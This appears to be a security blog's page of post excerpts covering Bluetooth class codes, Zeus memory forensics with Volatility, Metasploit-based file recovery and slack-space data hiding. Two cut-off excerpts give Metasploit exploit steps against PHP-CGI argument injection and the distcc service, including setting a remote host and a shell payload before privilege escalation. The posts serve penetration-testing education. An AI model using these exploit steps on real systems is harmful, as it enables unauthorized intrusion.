Posts

Service And Device Class of Bluetooth

The following is a list of the device and service classes that can be used in Bluetooth exploitation.

1. Bluetooth Device Classes
AUDIO_VIDEO (Value: 0x00000400)
COMPUTER (Value: 0x00000100)
HEALTH (Value: 0x00000900)
IMAGING (Value: 0x00000600)
MISC (Value: 0x00000000)
NETWORKING (Value: 0x00000300)
PERIPHERAL (Value: 0x00000500)
PHONE (Value: 0x00000200)
TOY (Value: 0x00000800)
UNCATEGORIZED (Value: 0x00001f00)
WEARABLE (Value: 0x00000700)

2. Bluetooth Service Classes
AUDIO (Value: 0x00200000)
CAPTURE (Value: 0x00080000)
INFORMATION (Value: 0x00800000)
LIMITED_DISCOVERABILITY (Value: 0x00002000)
NETWORKING (Value: 0x00020000)
OBJECT_TRANSFER (Value: 0x00100000)
POSITIONING (Value: 0x00010000)
RENDER (Value: 0x00040000)
TELEPHONY (Value: 0x00400000)

HOW TO?
hciconfig is used to configure Bluetooth devices.
hci0 is the name of a Bluetooth device installed in the system.
For help, use this command: hciconfig --help def

Forensic - Zbot Trojan Horse Analysis

Zeus, or the Zbot Trojan horse, is malware that runs on computers under the Microsoft Windows operating system; attackers use it to perform malicious tasks such as stealing banking information. You can continue reading it here.

Volatility testing: this time I received a file that has been infected by the Zeus Trojan, named "zeus.vmem".

1.) The first stage uses the command "imageinfo" to identify information for the image.
root@Double-H:~# vol -f ~/Desktop/Zeus/zeus.vmem imageinfo
-f = filename
imageinfo = identify information for the image

Next, we can use the command "pslist" to display a list of all processes in the file "zeus.vmem".
Command:
root@Double-H:~# vol -f ~/Desktop/Zeus/zeus.vmem pslist

As seen in the picture above, we have not found anything strange, so we can try the command "connscan" to see whether the file made any connections.
Command: root@D

Forensic - File Recovery (Fire With Metasploit)

Hi guys, missed me? Yeah, I think most of you are looking forward to my posts =)). As I promised earlier this year, I will discuss forensics a lot, so have a look at my writing this time.

Equipment:
1. Metasploit
Note: make sure you have reached a meterpreter session before this stage.

The next stage is selecting the module "enum_drives". This module will list the physical drives and logical volumes.
msf > use post/windows/gather/forensics/enum_drives
msf post(enum_drives) > show options
msf post(enum_drives) > set SESSION 1
msf post(enum_drives) > run

There are multiple logical volumes shown; I chose drive "E" for the test by selecting the module "recovery_files". This module lists and tries to recover deleted files from NTFS file systems.
msf post(enum_drives) > use post/windows/gather/forensics/recovery_files
msf post(recovery_files) > show options
msf post(recovery_files) > set SESSION

Forensic - Data Hiding

This year I will most likely discuss many forensic issues. I know many people who have not been involved in the forensic world, and many think that forensics is difficult; I suggest that you keep reading and learning a lot, so that what you think is hard becomes easy. As a start, I will discuss how to conceal messages in the slack space of a file.

Description: slack space is space that is not in use. It is the unused part of a fixed-size block that the file system uses to store data; it occurs naturally because data rarely fills fixed storage locations exactly. In forensics, slack space is examined because it may contain important data.

Download the Bmap tools here.

Configuration: extract this file:
tar -xzvf bmap-1.0.17.tar.gz
cp -r bmap-1.0.17 /opt/
cd /opt/bmap-1.0.17 ; ls
Then compile it using the command:
# make
After compiling, the bmap directory should look as shown below.

How To: I created a file with the exten

Exploit php Injection obtain user Hashes

Hello all. Are you still loyal to my posts? :) On this occasion I will show a few ways for those of you who like to do penetration testing. As you know, penetration testing does not stop when a problem is found, but on this occasion I will share some of these issues so that we can overcome them. At this stage I will try to exploit an existing weakness in the CGI (Common Gateway Interface) for PHP (Personal Home Page) 5.x.x.

Description: When run as a CGI, PHP 5.3.12 and up to version 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. (You can find the complete information by typing info while using the module.)

OK, now I will show you how :)
Open your Metasploit using the command:
# msfconsole
Then type this command to use the module:
Command:
msf > use exploit/multi/http/php_cgi_arg_injection
msf exploit(php_cgi_arg

[Video] Local Exploit Privilege Escalation

Hey guys, tonight I will share how to get root privileges by exploiting the vulnerability that exists in the "distcc" service on the machine. About distcc: distcc is designed to speed up compilation by taking advantage of unused processing power on other computers.

How to:
1. Scan the target using the command:
nmap -p 1-56635 -sS target-ip-addr
then look for port 3633 (distccd).
2. Open your Metasploit and enter these commands:
msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > set RHOST 192.168.1.10
RHOST => 192.168.1.10
msf exploit(distcc_exec) > set PAYLOAD cmd/unix/bind_ruby
PAYLOAD => cmd/unix/bind_ruby
msf exploit(distcc_exec) > exploit
Wait until the command shell session opens.
3. Then use these commands:
uname -r (kernel version)
whoami (print the user name associated with the current effective user ID)
At this stage we do not have the root user ID, so let's start privilege escalation. Make sure the ker